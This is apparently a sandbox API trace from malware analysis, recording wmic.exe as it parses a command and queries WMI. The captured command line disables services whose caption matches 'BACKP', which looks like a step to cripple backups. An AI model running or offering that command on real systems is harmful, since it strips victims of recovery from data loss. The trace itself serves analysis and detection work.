SysStringLen (param_1="VALUE") returned 0x5 [0119.635] SysStringLen (param_1="XML") returned 0x3 [0119.635] SysStringLen (param_1="MOF") returned 0x3 [0119.635] SysStringLen (param_1="TABLE") returned 0x5 [0119.635] SysStringLen (param_1="MOF") returned 0x3 [0119.635] SysStringLen (param_1="LIST") returned 0x4 [0119.635] SysStringLen (param_1="MOF") returned 0x3 [0119.635] SysStringLen (param_1="RAWXML") returned 0x6 [0119.635] SysStringLen (param_1="LIST") returned 0x4 [0119.635] SysStringLen (param_1="MOF") returned 0x3 [0119.636] SysStringLen (param_1="CSV") returned 0x3 [0119.636] SysStringLen (param_1="TABLE") returned 0x5 [0119.636] SysStringLen (param_1="CSV") returned 0x3 [0119.636] SysStringLen (param_1="LIST") returned 0x4 [0119.636] SysStringLen (param_1="CSV") returned 0x3 [0119.636] SysStringLen (param_1="HTABLE") returned 0x6 [0119.636] SysStringLen (param_1="CSV") returned 0x3 [0119.636] SysStringLen (param_1="HFORM") returned 0x5 [0119.636] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.636] SysStringLen (param_1="TABLE") returned 0x5 [0119.636] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.636] SysStringLen (param_1="VALUE") returned 0x5 [0119.636] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.636] SysStringLen (param_1="XML") returned 0x3 [0119.636] SysStringLen (param_1="XML") returned 0x3 [0119.636] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.637] SysStringLen (param_1="texttablewsys") returned 0xd [0119.637] SysStringLen (param_1="TABLE") returned 0x5 [0119.637] SysStringLen (param_1="texttablewsys") returned 0xd [0119.637] SysStringLen (param_1="XML") returned 0x3 [0119.637] SysStringLen (param_1="texttablewsys") returned 0xd [0119.637] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.637] SysStringLen (param_1="XML") returned 0x3 [0119.637] SysStringLen (param_1="texttablewsys") returned 0xd [0119.637] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.637] SysStringLen (param_1="TABLE") returned 0x5 [0119.637] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.637] SysStringLen (param_1="XML") returned 0x3 [0119.637] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.637] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.637] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.637] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.638] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0119.638] SysStringLen (param_1="TABLE") returned 0x5 [0119.638] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0119.638] SysStringLen (param_1="XML") returned 0x3 [0119.638] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0119.638] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.638] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0119.638] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.638] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.638] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0119.638] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.638] SysStringLen (param_1="TABLE") returned 0x5 [0119.638] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.638] SysStringLen (param_1="XML") returned 0x3 [0119.638] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.638] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.638] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.638] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.638] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.638] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.639] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0119.639] SysStringLen (param_1="TABLE") returned 0x5 [0119.639] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0119.639] SysStringLen (param_1="XML") returned 0x3 [0119.639] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0119.639] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.639] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0119.639] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.639] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0119.639] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.639] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.639] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0119.639] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0119.639] SysStringLen (param_1="TABLE") returned 0x5 [0119.639] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0119.639] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.639] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0119.639] SysStringLen (param_1="XML") returned 0x3 [0119.639] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0119.639] SysStringLen (param_1="texttablewsys") returned 0xd [0119.639] SysStringLen (param_1="XML") returned 0x3 [0119.639] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0119.640] SysStringLen (param_1="htable-sortby") returned 0xd [0119.640] SysStringLen (param_1="TABLE") returned 0x5 [0119.640] SysStringLen (param_1="htable-sortby") returned 0xd [0119.640] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.640] SysStringLen (param_1="htable-sortby") returned 0xd [0119.640] SysStringLen (param_1="XML") returned 0x3 [0119.640] SysStringLen (param_1="htable-sortby") returned 0xd [0119.640] SysStringLen (param_1="texttablewsys") returned 0xd [0119.640] SysStringLen (param_1="htable-sortby") returned 0xd [0119.640] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0119.640] SysStringLen (param_1="XML") returned 0x3 [0119.640] SysStringLen (param_1="htable-sortby") returned 0xd [0119.640] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0119.640] SysStringLen (param_1="TABLE") returned 0x5 [0119.640] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0119.640] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.641] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0119.641] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.641] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0119.641] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0119.641] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.641] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0119.641] SysStringLen (param_1="wmiclimofformat") returned 0xf [0119.641] SysStringLen (param_1="TABLE") returned 0x5 [0119.641] SysStringLen (param_1="wmiclimofformat") returned 0xf [0119.641] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.641] SysStringLen (param_1="wmiclimofformat") returned 0xf [0119.641] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.641] SysStringLen (param_1="wmiclimofformat") returned 0xf [0119.641] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0119.641] SysStringLen (param_1="wmiclimofformat") returned 0xf [0119.641] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0119.641] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.641] SysStringLen (param_1="wmiclimofformat") returned 0xf [0119.642] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0119.642] SysStringLen (param_1="TABLE") returned 0x5 [0119.642] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0119.642] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.642] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0119.642] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.642] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0119.642] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.642] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.642] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0119.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0119.642] SysStringLen (param_1="TABLE") returned 0x5 [0119.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0119.642] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0119.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0119.642] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0119.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0119.642] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0119.642] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0119.642] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0119.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0119.642] FreeThreadedDOMDocument:IUnknown:Release (This=0x57e45a8) returned 0x0 [0119.642] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'" [0119.643] memcpy_s (in: _Destination=0x11e8058, _DestinationSize=0x9e, _Source=0xfa1588, _SourceSize=0x9a | out: _Destination=0x11e8058) returned 0x0 [0119.643] GetLocalTime (in: lpSystemTime=0xecfb58 | out: lpSystemTime=0xecfb58*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0xc, wMilliseconds=0x1f2)) [0119.643] _vsnwprintf (in: _Buffer=0x11e8100, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xecfb38 | out: _Buffer="04-15-2018T10:09:12") returned 19 [0119.643] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.643] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.643] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.643] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.643] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.643] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.643] lstrlenW (lpString="SERVICE") returned 7 [0119.643] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0119.643] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.643] lstrlenW (lpString="WHERE") returned 5 [0119.643] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0119.643] memmove_s (in: _Destination=0x11e2c78, _DestinationSize=0x4, _Source=0x11e2c68, _SourceSize=0x4 | out: _Destination=0x11e2c78) returned 0x0 [0119.643] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.643] lstrlenW (lpString="'caption LIKE '%BACKP%''") returned 24 [0119.643] _wcsicmp (_String1="'caption LIKE '%BACKP%''", _String2="\"NULL\"") returned 5 [0119.643] lstrlenW (lpString="'caption LIKE '%BACKP%''") returned 24 [0119.643] lstrlenW (lpString="'caption LIKE '%BACKP%''") returned 24 [0119.643] memmove_s (in: _Destination=0x11e7c98, _DestinationSize=0x8, _Source=0x11e2c78, _SourceSize=0x8 | out: _Destination=0x11e7c98) returned 0x0 [0119.643] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.643] lstrlenW (lpString="CALL") returned 4 [0119.643] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0119.643] memmove_s (in: _Destination=0x11e7ff8, _DestinationSize=0xc, _Source=0x11e7c98, _SourceSize=0xc | out: _Destination=0x11e7ff8) returned 0x0 [0119.644] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.644] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.644] _wcsicmp (_String1="ChangeStartMode", _String2="\"NULL\"") returned 65 [0119.644] memmove_s (in: _Destination=0x11e2478, _DestinationSize=0x10, _Source=0x11e7ff8, _SourceSize=0x10 | out: _Destination=0x11e2478) returned 0x0 [0119.644] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'") returned 73 [0119.644] lstrlenW (lpString="'Disabled'") returned 10 [0119.644] _wcsicmp (_String1="'Disabled'", _String2="\"NULL\"") returned 5 [0119.644] lstrlenW (lpString="'Disabled'") returned 10 [0119.644] lstrlenW (lpString="'Disabled'") returned 10 [0119.644] lstrlenW (lpString="QUIT") returned 4 [0119.644] lstrlenW (lpString="SERVICE") returned 7 [0119.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0119.644] lstrlenW (lpString="EXIT") returned 4 [0119.644] lstrlenW (lpString="SERVICE") returned 7 [0119.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0119.644] WbemLocator:IUnknown:AddRef (This=0xfa74f8) returned 0x2 [0119.644] lstrlenW (lpString="/") returned 1 [0119.644] lstrlenW (lpString="SERVICE") returned 7 [0119.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0119.644] lstrlenW (lpString="-") returned 1 [0119.644] lstrlenW (lpString="SERVICE") returned 7 [0119.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0119.644] lstrlenW (lpString="CLASS") returned 5 [0119.644] lstrlenW (lpString="SERVICE") returned 7 [0119.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0119.644] lstrlenW (lpString="PATH") returned 4 [0119.644] lstrlenW (lpString="SERVICE") returned 7 [0119.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0119.644] lstrlenW (lpString="CONTEXT") returned 7 [0119.644] lstrlenW (lpString="SERVICE") returned 7 [0119.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0119.644] lstrlenW (lpString="SERVICE") returned 7 [0119.644] lstrlenW (lpString="SERVICE") returned 7 [0119.644] GetCurrentThreadId () returned 0x9cc [0119.644] ??0CHString@@QAE@XZ () returned 0xecfaac [0119.644] WbemLocator:IWbemLocator:ConnectServer (in: This=0xfa74f8, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xfd0820) returned 0x0 [0119.666] CoSetProxyBlanket (pProxy=0xfd0820, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0119.666] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.667] GetCurrentThreadId () returned 0x9cc [0119.667] ??0CHString@@QAE@XZ () returned 0xecfa54 [0119.667] SysStringLen (param_1="root\\cli") returned 0x8 [0119.667] SysStringLen (param_1="\\") returned 0x1 [0119.667] SysStringLen (param_1="root\\cli\\") returned 0x9 [0119.667] SysStringLen (param_1="ms_409") returned 0x6 [0119.667] WbemLocator:IWbemLocator:ConnectServer (in: This=0xfa74f8, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xfd0a50) returned 0x0 [0119.674] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.674] GetCurrentThreadId () returned 0x9cc [0119.674] ??0CHString@@QAE@XZ () returned 0xecfab0 [0119.674] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0119.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x11e8a78, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0119.674] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0119.675] SysStringLen (param_1="SERVICE") returned 0x7 [0119.675] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0119.675] SysStringLen (param_1="'") returned 0x1 [0119.675] IWbemServices:GetObject (in: This=0xfd0820, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xecfaac*=0x0, ppCallResult=0x0 | out: ppObject=0xecfaac*=0xff5328, ppCallResult=0x0) returned 0x0 [0119.684] IWbemClassObject:Get (in: This=0xff5328, wszName="Target", lFlags=0, pVal=0xecfa84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecfa84*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.684] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0119.684] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0119.684] IWbemClassObject:Get (in: This=0xff5328, wszName="PWhere", lFlags=0, pVal=0xecfa84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecfa84*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.684] lstrlenW (lpString="WHERE Name='#'") returned 14 [0119.684] lstrlenW (lpString="WHERE Name='#'") returned 14 [0119.684] IWbemClassObject:Get (in: This=0xff5328, wszName="Connection", lFlags=0, pVal=0xecfa84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecfa84*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff56e8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.684] IUnknown:QueryInterface (in: This=0xff56e8, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xecfaa0 | out: ppvObject=0xecfaa0*=0xff56e8) returned 0x0 [0119.684] GetCurrentThreadId () returned 0x9cc [0119.684] ??0CHString@@QAE@XZ () returned 0xecfa20 [0119.684] IWbemClassObject:Get (in: This=0xff56e8, wszName="Namespace", lFlags=0, pVal=0xecfa04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecfa04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.684] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0119.684] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0119.684] IWbemClassObject:Get (in: This=0xff56e8, wszName="Locale", lFlags=0, pVal=0xecfa04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfd701c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecfa04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.684] lstrlenW (lpString="ms_409") returned 6 [0119.684] lstrlenW (lpString="ms_409") returned 6 [0119.684] IWbemClassObject:Get (in: This=0xff56e8, wszName="User", lFlags=0, pVal=0xecfa04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfd701c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecfa04*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.685] IWbemClassObject:Get (in: This=0xff56e8, wszName="Password", lFlags=0, pVal=0xecfa04*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecfa04*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.685] IWbemClassObject:Get (in: This=0xff56e8, wszName="Server", lFlags=0, pVal=0xecfa04*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecfa04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.685] lstrlenW (lpString=".") returned 1 [0119.685] lstrlenW (lpString=".") returned 1 [0119.685] IWbemClassObject:Get (in: This=0xff56e8, wszName="Authority", lFlags=0, pVal=0xecfa04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfd701c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecfa04*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.685] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.685] IUnknown:Release (This=0xff56e8) returned 0x1 [0119.685] GetCurrentThreadId () returned 0x9cc [0119.685] ??0CHString@@QAE@XZ () returned 0xecfa10 [0119.685] IWbemClassObject:Get (in: This=0xff5328, wszName="__RELPATH", lFlags=0, pVal=0xecf9f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf9f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.685] GetCurrentThreadId () returned 0x9cc [0119.685] ??0CHString@@QAE@XZ () returned 0xecf98c [0119.685] ??0CHString@@QAE@PBG@Z () returned 0xecf988 [0119.685] ??0CHString@@QAE@ABV0@@Z () returned 0xecf908 [0119.685] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0119.685] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x11e8ab8 [0119.685] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0119.685] ?Left@CHString@@QBE?AV1@H@Z () returned 0xecf900 [0119.685] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xecf904 [0119.685] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xecf988 [0119.685] ??1CHString@@QAE@XZ () returned 0x1 [0119.685] ??1CHString@@QAE@XZ () returned 0x1 [0119.685] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xecf8fc [0119.685] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xecf908 [0119.685] ??1CHString@@QAE@XZ () returned 0x1 [0119.685] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x11e8b18 [0119.685] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0119.685] ?Left@CHString@@QBE?AV1@H@Z () returned 0xecf900 [0119.685] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xecf904 [0119.685] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xecf988 [0119.685] ??1CHString@@QAE@XZ () returned 0x1 [0119.685] ??1CHString@@QAE@XZ () returned 0x1 [0119.685] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xecf8fc [0119.685] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xecf908 [0119.686] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.686] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0119.686] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.686] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0119.686] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0119.686] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0119.686] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0119.686] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0119.686] SysStringLen (param_1="\"") returned 0x1 [0119.686] IWbemServices:GetObject (in: This=0xfd0a50, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xecf998*=0x0, ppCallResult=0x0 | out: ppObject=0xecf998*=0xff5ac8, ppCallResult=0x0) returned 0x0 [0119.688] IWbemClassObject:Get (in: This=0xff5ac8, wszName="Text", lFlags=0, pVal=0xecf964*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf964*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfdf4b0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xfd36d8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.688] SafeArrayGetLBound (in: psa=0xfdf4b0, nDim=0x1, plLbound=0xecf974 | out: plLbound=0xecf974) returned 0x0 [0119.688] SafeArrayGetUBound (in: psa=0xfdf4b0, nDim=0x1, plUbound=0xecf978 | out: plUbound=0xecf978) returned 0x0 [0119.688] SafeArrayGetElement (in: psa=0xfdf4b0, rgIndices=0xecf990, pv=0xecf97c | out: pv=0xecf97c) returned 0x0 [0119.688] SysStringLen (param_1="Service application management. ") returned 0x20 [0119.688] IUnknown:Release (This=0xff5ac8) returned 0x0 [0119.688] ??1CHString@@QAE@XZ () returned 0x1 [0119.688] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.688] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.688] lstrlenW (lpString="Service application management. ") returned 32 [0119.688] lstrlenW (lpString="Service application management. ") returned 32 [0119.688] IUnknown:Release (This=0xff5328) returned 0x0 [0119.689] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.689] lstrlenW (lpString="PATH") returned 4 [0119.689] lstrlenW (lpString="WHERE") returned 5 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0119.689] lstrlenW (lpString="WHERE") returned 5 [0119.689] lstrlenW (lpString="WHERE") returned 5 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0119.689] lstrlenW (lpString="/") returned 1 [0119.689] lstrlenW (lpString="caption LIKE '%BACKP%'") returned 22 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%BACKP%'", cchCount1=22, lpString2="/", cchCount2=1) returned 3 [0119.689] lstrlenW (lpString="-") returned 1 [0119.689] lstrlenW (lpString="caption LIKE '%BACKP%'") returned 22 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%BACKP%'", cchCount1=22, lpString2="-", cchCount2=1) returned 3 [0119.689] lstrlenW (lpString="caption LIKE '%BACKP%'") returned 22 [0119.689] lstrlenW (lpString="caption LIKE '%BACKP%'") returned 22 [0119.689] lstrlenW (lpString="/") returned 1 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0119.689] lstrlenW (lpString="-") returned 